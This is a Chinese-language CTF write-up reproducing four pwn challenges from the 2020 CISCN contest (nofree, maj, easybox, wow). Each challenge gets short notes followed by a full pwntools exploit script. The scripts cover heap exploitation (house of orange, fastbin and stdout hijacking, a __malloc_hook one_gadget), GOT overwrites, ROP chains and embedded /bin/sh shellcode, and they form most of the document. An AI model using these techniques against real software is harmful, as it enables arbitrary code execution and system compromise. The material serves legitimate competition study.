---
title: 2020 ciscn pwn 复现
date: 2022-05-01 23:06:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=16/
pin: false
published:
---
这次复现决定自己先做一边题，学到很多，写的有点啰嗦，主要是记录给自己看的

## nofree(houseoforange/不确定libc版本)

主要讲一下做的过程中遇到的问题

1.**申请的空间太小难以伪造topchunk**，伪造topchunk最关键就是topchunk+topchunk_size要4kb页对齐，一般来讲控制低三位一样即可（因为第三位的和是一个咬合状态为0x1000），但有时候申请的size有限，事实上如果topchunk的倒数第三位是0，这样就能只需要控制后2位，0x90也就够用了。一开始想常规的hoo打到unsortbin，但没有show，没有UAF，没办法利用到unsortbin；改变思路发现打到fastbin能解决问题

2.**fasbinchunk需要伪造**，fastbin有size检测，不然申请不到会cash，一开始伪造的时候size输入错了，它申请的大小还切了2个0x10

3.**有任意地址写，但是没有泄露地址**，利用IO_stdout去泄露libc是一个思路，但这题申请不到IO，利用got表可写，atoi与printf的一个技巧实现任意地址泄露

4.**不知道libc版本，就算有偏移，libc相关函数全部定位不了**,不知道版本，意味着泄露libc也没用，索性就放弃libc，**依赖程序的got表**，使用已有的函数实现rop，有能泄露read的真实地址，想getshell就只能依靠syscall，syscall=read+0xe，再利用csureadexec一波流

5.**怎么触发rop**，这堆栈转移思想，在edit结束的地方下断点，看edit功能ret指令的栈地址，和泄露的栈地址算个偏移即可

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'

p = process('./pwn')
elf = ELF("./pwn")

# p = remote("123.60.76.240","60001")
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def new(idx,size,con):
	sla('choice>> ',1)
	sla("idx: ",idx)
	sla("size: ",size)
	p.sendafter("content: ",con)

def edit(idx,con):
	sla('choice>> ',2)
	sla("idx: ",idx)
	p.sendafter("content: ",con)

def edit_x(idx,con):
	sla('choice>> ','1')
	sla("idx: ",(idx-1)*'1')
	p.sendafter("content: ",con)

ptrc=0x6020C0+0x100

atoi_plt = elf.plt['atoi']
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
exit_got = elf.got['exit']
retn = 0x4006B9 
read_got = elf.got['read']
pop_rdi = 0x0000000000400c23
pop_rsi_r15=0x0000000000400c21
'''
0x0000000000400c23: pop rdi; ret; 
0x0000000000400c21: pop rsi; pop r15; ret;
'''
# hoo
for i in range(0xeff):
	new(0,0x90,'a'*0x90)
new(1,0x90,'a'*0x40)

edit(1,'a'*0x48+p64(0x51))
# fake size and alloc crl 实现任意地址写
new(0,0x51,'a'*0x50)
edit(1,'a'*0x48+p64(0x31)+p64(ptrc))

new(0,0x31,'0'*0x30)
new(2,0x90,'0'*0x20)
new(2,0x90,'0'*0x20)
edit(2,p64(exit_got)+p64(0x20))
edit(1,p64(retn))
edit(2,p64(atoi_got)+p64(0x20))
edit(1,p64(printf_plt))
# pay = "%7$s"

sla("choice>> ","%7$s%8$s"+p64(printf_got)+p64(read_got))
printf = uu64()
read = uu64()
syscall = read+0xe
lg('syscall',syscall)
csu1 = 0x400C1A
csu2 = 0x400C00


sla("choice>> ","%12$s")
stack_addr = uu64()
lg('stack_addr',stack_addr)
bss = elf.bss()+0x600

edit_x(2,p64(stack_addr-0x18)+p64(0x100)+'/bin/sh\x00'+p64(syscall))
pay = p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(bss)+p64(0)+p64(read)
pay += p64(csu1)+p64(0)+p64(1)+p64(0x6020C0+0x100+0x28)+p64(0)+p64(0)+p64(0x6020C0+0x100+0x20)
pay += p64(csu2)
edit_x(1,pay)
p.send('0'*59)

p.interactive()
```

## maj(stdout劫持打malloc_hook)

还是主要讲一下做的过程中遇到的问题，主要就是fastbin的size检测

1.**stdout劫持和fastbin申请malloc_hook都要申请0x68的chunk**，由于fastbin的size检测机制，我们伪造的目标位置伪造的是0x7f

2.**修改stdout自己gdb选一个地址**，这个没什么好说的

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'
# p = remote("123.60.76.240","60001")
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size,con):
	sla(">> ","1")
	sla("please answer the question",80)
	sla("______?",size)
	p.sendafter("start_the_game,yes_or_no?",con)

def dele(idx):
	sla(">> ","2")
	sla("index ?",idx)

def check(idx):
	sla(">> ","3")
	sla("index ?",idx)

def edit(idx,con):
	sla(">> ","4")
	sla("index ?",idx)
	p.sendafter("__new_content ?",con)

con = 0x6033E0
ptr = 0x6032E0
ptrsize = 0x603260
while True:
	p = process('./pwn')
	elf = ELF("./pwn")
	libc = elf.libc
	try:
		add(0x78,'bbb')#0
		add(0x68,'bbb')#1
		add(0x81,'bbb')#2
		add(0x78,'bbb')#3
		# 假死
		add(0x68,'bbb')#4 *
		add(0x68,'bbb')#5
		add(0x68,'bbb')#6
		add(0x68,'bbb')#7
		dele(0)
		edit(0,p64(ptrsize))
		add(0x78,'a'*0x78)#8
		add(0x78,'a')#9 size
		edit(9,p32(0x300))

		dele(6)
		dele(5)
		edit(4,'\x00'*0x68+p64(0xe1))
		dele(5)
		edit(5,'\xdd\xe5')
		edit(4,'\x00'*0x68+p64(0x71))
		add(0x68,'aaa')#10
		add(0x68,'aaa')#11
		pay = 'a'*51+p64(0xfbad1887)+p64(0)+p64(0)+p64(0)+p8(0x58)
		edit(11,pay)
		libc_base = uu64()-libc.sym['_IO_2_1_stdout_']-131
		lg("libc_base",libc_base)

		free_hook = libc_base+libc.sym["__free_hook"]
		malloc_hook = libc_base+libc.sym["__malloc_hook"]
		one = libc_base + 0xf1247
		'''
		0x45226 execve("/bin/sh", rsp+0x30, environ)
		constraints:
		  rax == NULL

		0x4527a execve("/bin/sh", rsp+0x30, environ)
		constraints:
		  [rsp+0x30] == NULL

		0xf03a4 execve("/bin/sh", rsp+0x50, environ)
		constraints:
		  [rsp+0x50] == NULL

		0xf1247 execve("/bin/sh", rsp+0x70, environ)
		constraints:
		  [rsp+0x70] == NULL
		'''
		dele(1)
		edit(1,p64(malloc_hook-0x23))
		add(0x68,'a')#12
		add(0x68,'a')#13
		edit(13,'a'*0x13+p64(one))
		sla(">> ","1")
		sla("please answer the question",80)
		sla("______?",0x16)
		break
	except:
		p.close()
		continue
p.interactive()
```

## easybox(无show/无edit/offbyone向下合并)

1.**选择向下合并和向上合并**，这个具体还是看情况，一般来说向下合并主要是改size位 offbyone用的比较多，向上合并主要是改prev_size位，需要有prev_size位的残留，offbynull用的比较多

2.**没有edit，怎么修改fd**，这里就是利用一个堆复用，在fastbinchunk和unsortbinchunk是一个头节点，那我改unsortbin的fd那fasbin就和一起变，这里换个size切割，就不会影响的fasbinchunk了

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'

# p = remote("123.60.76.240","60001")
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def add(idx,size,con):
	sla(">>>",1)
	sla("idx:",idx)
	sla("len:",size)
	p.sendafter("content:",con)

def dele(idx):
	sla(">>>",2)
	sla("idx:",idx)	
# if(True):
while True:
	p = process('./pwn')
	elf = ELF("./pwn")
	libc = elf.libc
	try:
		add(0,0x28,'E4L4')
		add(1,0x58,'bbb')
		add(2,0x68,'bbb')
		add(3,0x68,'bbb')

		dele(0)
		dele(2)
		add(0,0x28,'\x00'*0x28+'\xd1')
		dele(1)

		add(1,0x58,'bbb')
		dele(1)
		add(2,0x28,'\xdd\xe5')
		add(1,0x58,'a'*0x58+'\x71')
		add(2,0x68,'a')
		add(2,0x68,'a'*51+p64(0xfbad1887)+p64(0)+p64(0)+p64(0)+p8(0x58))
		libc_base = uu64()-libc.sym['_IO_2_1_stdout_']-131
		lg("libc_base",libc_base)

		free_hook = libc_base+libc.sym["__free_hook"]
		malloc_hook = libc_base+libc.sym["__malloc_hook"]
		one = libc_base + 0xf1247
		lg('one',one)
		lg('malloc_hook',malloc_hook)

		add(5,0x38,'bbb')
		add(0,0x28,'E4L4')
		add(1,0x58,'bbb')
		add(2,0x68,'bbb')
		add(3,0x68,'bbb')

		dele(0)
		dele(2)
		add(0,0x28,'\x00'*0x28+'\xd1')
		dele(1)

		add(1,0x58,'bbb')
		dele(1)
		add(2,0x28,p64(malloc_hook-0x23))
		add(1,0x58,'a'*0x58+'\x71')
		add(2,0x68,'a')
		add(2,0x68,'a'*0x13+p64(one))
		sla(">>>",1)
		sla("idx:",6)
		sla("len:",0x10)
		break
	except:
		p.close()
p.interactive()
```

## wow

```python
from pwn import*

p = process('./wow')

#context.log_level ='DEBUG'

payload = '${@$}@$'
payload = payload.replace('\n','')

p.sendlineafter('enter your code:',payload)

for i in range(0x400):
	p.send('\xFF')

p.send('\x10')
stack = u64(p.recvuntil('\x7F',timeout=0.2)[-6:].ljust(8,'\x00'))
log.info('Stack:\t' + hex(stack))
p.send('Y')
p.sendlineafter('enter your code:','F'*0x10 + '\x08' + '\x01'*0x10)
p.send('Y')
p.sendlineafter('enter your code:','F'*0x8 + '\x78')
p.send('Y')
p.sendlineafter('enter your code:','F'*0x10 + '\x48')
p.send('Y')

target_FLAG = stack + 0x138
mov_rax_1 = 0x524300
mov_rax_2 = 0x524310
mov_rax_rsi = 0x417427
pop_rdi_ret = 0x4047BA
pop_rsi_ret = 0x407578
pop_rdx_ret = 0x40437F
pop_rsp_ret = 0x405831
syscall = 0x52A725

rop  = '\x00'*0x30
rop += p64(pop_rdi_ret) + p64(target_FLAG)
rop += p64(pop_rsi_ret) + p64(0)
rop += p64(pop_rdx_ret) + p64(0)
rop += p64(mov_rax_2)
rop += p64(syscall)
rop += p64(pop_rdi_ret) + p64(3)
rop += p64(pop_rsi_ret) + p64(0)
rop += p64(mov_rax_rsi)
rop += p64(pop_rsi_ret) + p64(0x5D9B00)
rop += p64(pop_rdx_ret) + p64(0x30)
rop += p64(syscall)
rop += p64(pop_rdi_ret) + p64(1)
rop += p64(pop_rsi_ret) + p64(0x5D9B00)
rop += p64(pop_rdx_ret) + p64(0x30)
rop += p64(mov_rax_1)
rop += p64(syscall)
rop += './flag\x00'

p.sendlineafter('enter your code:',rop)
p.send('Y')
p.sendlineafter('enter your code:',payload)
for i in range(0x400):
	p.send('\x20')
p.send('\x20')
p.send('N')
p.interactive()

'''
@ ptr += 1
# ptr -= 1
^ *ptr += 1
| *ptr -= 1
& write(1,ptr,1)
$ read(0,ptr,1)
* (*ptr)<<2
~ ~(*ptr)
{ be similar to while 
}
'''
```

